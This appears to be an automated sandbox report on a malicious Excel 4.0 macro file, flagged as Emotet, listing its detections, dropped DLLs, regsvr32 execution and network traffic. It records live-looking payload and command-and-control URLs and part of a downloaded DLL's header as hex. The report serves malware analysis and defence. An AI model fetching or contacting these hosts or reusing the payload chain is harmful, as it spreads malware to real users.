Windows Analysis Report
qd_34768.xlsm

Overview

General Information

Sample Name: qd_34768.xlsm
Analysis ID: 601134
MD5: 07f30f1fa5420f050ea5929af0f95265
SHA1: 6310b51fca4003fb36252367f058c2e990ba5734
SHA256: 48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
Tags: xlsm

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected MalDoc1
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: qd_34768.xlsm ReversingLabs: Detection: 40%
Source: http://eles-tech.com/css/KzMysMqFMs/ Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar Avira URL Cloud: Label: malware
Source: https://68.183.94.239/ Avira URL Cloud: Label: malware
Source: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural Avira URL Cloud: Label: malware
Source: eles-tech.com Virustotal: Detection: 9%
Source: http://eles-tech.com/css/KzMysMqFMs/ Virustotal: Detection: 10%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100492F7 FindFirstFileA,FindClose, 3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004168D2 FindFirstFileW, 5_2_004168D2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: eVzUZ7dv5zBAXa5[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic DNS query: name: eles-tech.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.46.40.47:80

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 68.183.94.239 80
Source: Yara match File source: sharedStrings.xml, type: SAMPLE
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: TELLCOM-ASTR TELLCOM-ASTR
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 31 Mar 2022 20:52:02 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Thu, 31 Mar 2022 20:52:02 GMTContent-Disposition: attachment; filename="eVzUZ7dv5zBAXa5.dll"Content-Transfer-Encoding: binarySet-Cookie: 6246147296b82=1648759922; expires=Thu, 31-Mar-2022 20:53:02 GMT; Max-Age=60; path=/Last-Modified: Thu, 31 Mar 2022 20:52:02 GMTContent-Length: 868352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 fc 6d bc 5d 9d 03 ef 5d 9d 03 ef 5d 9d 03 ef 0b 82 10 ef 78 9d 03 ef 5d 9d 03 ef 65 9d 03 ef 3f 82 10 ef 4e 9d 03 ef 5d 9d 02 ef 88 9c 03 ef de 81 0d ef 46 9d 03 ef b5 82 09 ef d6 9d 03 ef e5 9b 05 ef 5c 9d 03 ef b5 82 08 ef df 9d 03 ef b5 82 07 ef 5c 9d 03 ef 52 69 63 68 5d 9d 03 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a7 31 46 62 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 90 07 00 00 f0 05 00 00 00 00 00 10 a9 01 00 00 10 00 00 00 a0 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 0d 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 d5 08 00 ae 01 00 00 00 80 09 00 04 01 00 00 00 c0 09 00 33 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 5c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8c 09 00 a0 0b 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e 8e 07 00 00 10 00 00 00 90 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4e 37 01 00 00 a0 07 00 00 40 01 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 98 00 00 00 e0 08 00 00 50 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 e5 3c 00 00 00 80 09 00 00 40 00 00 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 33 34 03 00 00 c0 09 00 00 40 03 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 47 89 00 00 00 00 0d 00 00 90 00 00 00 b0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Source: global traffic HTTP traffic detected: GET /css/KzMysMqFMs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eles-tech.comConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 68.183.94.239
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239/
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural
Source: regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar
Source: regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F230AC8.jpg
Source: unknown DNS traffic detected: queries for: eles-tech.com
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_00405D75 InternetReadFile, 5_2_00405D75
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1003BD55 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent, 3_2_1003BD55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10044296 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 3_2_10044296
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1004697A GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_1004697A

E-Banking Fraud

Source: Yara match File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ::
Source: Screenshot number: 8 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: -Aj 19 20 21 22 23
Source: qd_34768.xlsm Macro extractor: Sheet: PIMKE contains: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll
Source: qd_34768.xlsm Initial sample: EXEC
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002D9F0 3_2_1002D9F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10027A87 3_2_10027A87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10017A8D 3_2_10017A8D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10017C6A 3_2_10017C6A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100203BE 3_2_100203BE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10042F7D 3_2_10042F7D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C25E7 3_2_003C25E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE978 3_2_003DE978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D8BA1 3_2_003D8BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C8ED3 3_2_003C8ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CB1A1 3_2_003CB1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D31D5 3_2_003D31D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D39B8 3_2_003D39B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D7A53 3_2_003D7A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DFADC 3_2_003DFADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5AC9 3_2_003C5AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CDF44 3_2_003CDF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C3F40 3_2_003C3F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DC064 3_2_003DC064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C2050 3_2_003C2050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D609A 3_2_003D609A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D815D 3_2_003D815D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC14C 3_2_003CC14C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA1B1 3_2_003DA1B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C62BA 3_2_003C62BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE2E1 3_2_003DE2E1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC388 3_2_003CC388
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA455 3_2_003DA455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D44A7 3_2_003D44A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4497 3_2_003C4497
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CE4E2 3_2_003CE4E2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE4E3 3_2_003DE4E3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0552 3_2_003D0552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DC5E5 3_2_003DC5E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DE63C 3_2_003DE63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D2606 3_2_003D2606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E06E7 3_2_003E06E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D46DD 3_2_003D46DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D86C1 3_2_003D86C1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CC7B4 3_2_003CC7B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E0887 3_2_003E0887
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D4930 3_2_003D4930
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4949 3_2_003C4949
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C89F6 3_2_003C89F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DA9EE 3_2_003DA9EE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0A27 3_2_003D0A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003E0A1E 3_2_003E0A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CEA8C 3_2_003CEA8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D6B98 3_2_003D6B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0B84 3_2_003D0B84
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CEC5D 3_2_003CEC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D2CAC 3_2_003D2CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4D13 3_2_003C4D13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C4E03 3_2_003C4E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C2E8C 3_2_003C2E8C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D8EF4 3_2_003D8EF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DEECF 3_2_003DEECF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C6F64 3_2_003C6F64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CAF67 3_2_003CAF67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DAFB1 3_2_003DAFB1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D0F87 3_2_003D0F87
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CD0F7 3_2_003CD0F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DB1BA 3_2_003DB1BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C51B7 3_2_003C51B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D51F0 3_2_003D51F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C323D 3_2_003C323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D92F0 3_2_003D92F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C7336 3_2_003C7336
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C53F6 3_2_003C53F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9400 3_2_003C9400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DF571 3_2_003DF571
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D75E7 3_2_003D75E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DB605 3_2_003DB605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DF6AE 3_2_003DF6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5717 3_2_003C5717
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CB7B5 3_2_003CB7B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CF88D 3_2_003CF88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CD933 3_2_003CD933
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C192C 3_2_003C192C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C7AB6 3_2_003C7AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CDAE6 3_2_003CDAE6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C1B3F 3_2_003C1B3F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9B4C 3_2_003C9B4C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C9C3D 3_2_003C9C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DDC64 3_2_003DDC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D7CA5 3_2_003D7CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D1DCF 3_2_003D1DCF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003D3E98 3_2_003D3E98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CFEF2 3_2_003CFEF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003CBF6E 3_2_003CBF6E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DFF4A 3_2_003DFF4A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003C5FA3 3_2_003C5FA3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_003DDFCE 3_2_003DDFCE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00247A53 4_2_00247A53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00235AC9 4_2_00235AC9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00238ED3 4_2_00238ED3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024FADC 4_2_0024FADC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E978 4_2_0024E978
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00233F40 4_2_00233F40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023DF44 4_2_0023DF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240552 4_2_00240552
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023B1A1 4_2_0023B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00248BA1 4_2_00248BA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002439B8 4_2_002439B8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002325E7 4_2_002325E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002431D5 4_2_002431D5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00240A27 4_2_00240A27
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024E63C 4_2_0024E63C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239C3D 4_2_00239C3D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023323D 4_2_0023323D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00234E03 4_2_00234E03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024B605 4_2_0024B605
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00242606 4_2_00242606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00239400 4_2_00239400
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00250A1E 4_2_00250A1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024C064 4_2_0024C064
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024DC64 4_2_0024DC64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024A455 4_2_0024A455
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00232050 4_2_00232050
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0023EC5D 4_2_0023EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00247CA5 4_2_00247CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002444A7 4_2_002444A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00242CAC 4_2_00242CAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0024F6AE 4_2_0024F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00237AB6 4_2_00237AB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_002362BA 4_2_002362BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00250887 4_2_00250887
